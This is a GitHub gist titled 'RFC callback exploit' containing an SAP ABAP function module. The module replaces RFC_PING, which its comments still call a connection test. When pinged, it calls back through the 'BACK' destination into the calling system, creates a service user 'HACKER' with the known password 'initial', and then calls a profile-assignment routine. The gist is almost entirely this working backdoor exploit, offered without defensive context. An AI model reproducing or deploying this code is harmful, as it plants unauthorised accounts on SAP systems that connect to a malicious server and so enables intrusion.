Skip to content

Instantly share code, notes, and snippets.

@topahl
Last active May 11, 2016 08:21
Show Gist options
  • Save topahl/a3afff2fbe5ae8d19e5be16289c045b8 to your computer and use it in GitHub Desktop.
Save topahl/a3afff2fbe5ae8d19e5be16289c045b8 to your computer and use it in GitHub Desktop.
RFC callback exploit
FUNCTION RFC_PING.
*"----------------------------------------------------------------------
*"*"Lokale Schnittstelle:
*"----------------------------------------------------------------------
* RFC - P I N G
*
* Funktion dient als Verbindungstest.
*"----------------------------------------------------------------------
DATA lv_username TYPE BAPIBNAME-BAPIBNAME.
DATA lv_logondata type BAPILOGOND.
DATA lv_psw type BAPIPWD.
DATA lv_adress type BAPIADDR3.
DATA lt_profiles type TABLE OF BAPIPROF.
DATA lv_profile LIKE LINE OF LT_PROFILES.
DATA lt_return type TABLE OF BAPIRET2.
lv_username = 'HACKER'.
lv_logondata-ustyp = 'S'.
Lv_psw = 'initial'.
lv_adress-lastname = 'Hack'.
CALL FUNCTION 'BAPI_USER_CREATE1' DESTINATION 'BACK'
EXPORTING
USERNAME = LV_USERNAME
LOGONDATA = LV_LOGONDATA
PASSWORD = LV_PSW
ADDRESS = LV_ADRESS.
CALL FUNCTION 'BAPI_USER_PROFILES_ASSIGN' DESTINATION 'BACK'
EXPORTING
USERNAME = LV_USERNAME
TABLES
PROFILES = LT_PROFILES
RETURN = LT_RETURN.
ENDFUNCTION.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment